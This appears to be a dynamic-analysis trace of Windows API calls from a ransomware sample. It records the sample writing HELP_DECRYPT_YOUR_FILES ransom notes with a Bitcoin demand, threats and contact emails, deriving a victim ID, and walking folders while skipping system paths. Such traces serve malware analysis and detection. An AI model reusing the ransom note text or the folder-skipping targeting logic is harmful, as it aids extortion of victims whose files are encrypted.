	[0170.264] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0170.264] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0170.267] CloseHandle (hObject=0x390) returned 1
	[0170.268] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.269] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0170.270] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0170.270] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0170.270] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0170.271] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0170.271] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0170.271] CloseHandle (hObject=0x390) returned 1
	[0170.272] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.272] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.272] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0170.272] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\HELP_DECRYPT_YOUR_FILES.HTML") returned 85
	[0170.272] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0170.273] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0170.273] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0170.277] CloseHandle (hObject=0x390) returned 1
	[0170.277] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.278] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.278] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.278] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0170.280] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.280] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0170.280] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0170.280] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.281] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0170.281] CloseHandle (hObject=0x390) returned 1
	[0170.281] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*.*" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x7f04586f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0170.282] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*.*") returned 60
	[0170.282] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.282] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*.*", cchLength=0x3c | out: lpsz="c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*") returned 0x3c
	[0170.282] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.282] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*", lpSrch="windows") returned 0x0
	[0170.283] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.283] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*", lpSrch="boot") returned 0x0
	[0170.283] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.283] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*", lpSrch="system volume information") returned 0x0
	[0170.283] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.283] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.284] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.284] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*", lpSrch="temp") returned="temp\\*.*"
	[0170.284] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0170.284] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="temp", cAlternateFileName="")) returned 0
	[0170.284] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0170.285] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0170.285] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="production", cAlternateFileName="PRODUC~1")) returned 0
	[0170.285] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0170.285] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0170.286] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MapData", cAlternateFileName="")) returned 1
	[0170.286] lstrcmpW (lpString1="MapData", lpString2="..") returned 1
	[0170.286] lstrcmpW (lpString1="MapData", lpString2=".") returned 1
	[0170.286] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0170.286] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0170.286] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="MapData" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MapData") returned="C:\\Users\\All Users\\Microsoft\\MapData"
	[0170.287] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\MapData" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MapData") returned="C:\\Users\\All Users\\Microsoft\\MapData"
	[0170.287] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\MapData", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MapData\\") returned="C:\\Users\\All Users\\Microsoft\\MapData\\"
	[0170.287] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\MapData\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MapData\\") returned="C:\\Users\\All Users\\Microsoft\\MapData\\"
	[0170.287] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\MapData\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MapData\\*.*") returned="C:\\Users\\All Users\\Microsoft\\MapData\\*.*"
	[0170.287] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MapData\\*.*" (normalized: "c:\\users\\all users\\microsoft\\mapdata\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0170.288] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MapData\\*.*") returned 40
	[0170.288] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.288] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MapData\\*.*", cchLength=0x28 | out: lpsz="c:\\users\\all users\\microsoft\\mapdata\\*.*") returned 0x28
	[0170.288] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.288] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="windows") returned 0x0
	[0170.288] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.289] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="boot") returned 0x0
	[0170.289] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.289] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="system volume information") returned 0x0
	[0170.289] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.289] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.289] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.289] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="temp") returned 0x0
	[0170.290] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.290] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="program files") returned 0x0
	[0170.290] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.290] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.290] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.301] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="appdata") returned 0x0
	[0170.301] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.301] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="application data") returned 0x0
	[0170.301] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.302] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="winnt") returned 0x0
	[0170.302] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.302] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="tmp") returned 0x0
	[0170.302] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.302] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="cache") returned 0x0
	[0170.302] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.303] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.303] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.303] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="webcache") returned 0x0
	[0170.303] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.303] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="inetcache") returned 0x0
	[0170.303] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.303] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="nvidia") returned 0x0
	[0170.304] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.304] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="packages") returned 0x0
	[0170.304] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.304] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="cookies") returned 0x0
	[0170.304] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.304] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="programdata") returned 0x0
	[0170.304] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.305] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0170.305] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0170.305] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0170.306] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\MapData" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MapData") returned="C:\\Users\\All Users\\Microsoft\\MapData"
	[0170.306] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\MapData", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MapData\\*.*") returned="C:\\Users\\All Users\\Microsoft\\MapData\\*.*"
	[0170.306] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.307] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.307] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\MapData\\HELP_DECRYPT_YOUR_FILES.TXT") returned 64
	[0170.307] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MapData\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\mapdata\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.308] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0170.308] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0170.311] CloseHandle (hObject=0x384) returned 1
	[0170.311] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.312] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0170.313] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0170.314] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MapData\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\mapdata\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.314] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0170.314] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0170.314] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0170.315] CloseHandle (hObject=0x384) returned 1
	[0170.315] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.315] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.315] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0170.315] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\MapData\\HELP_DECRYPT_YOUR_FILES.HTML") returned 65
	[0170.316] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MapData\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\mapdata\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.316] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0170.316] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
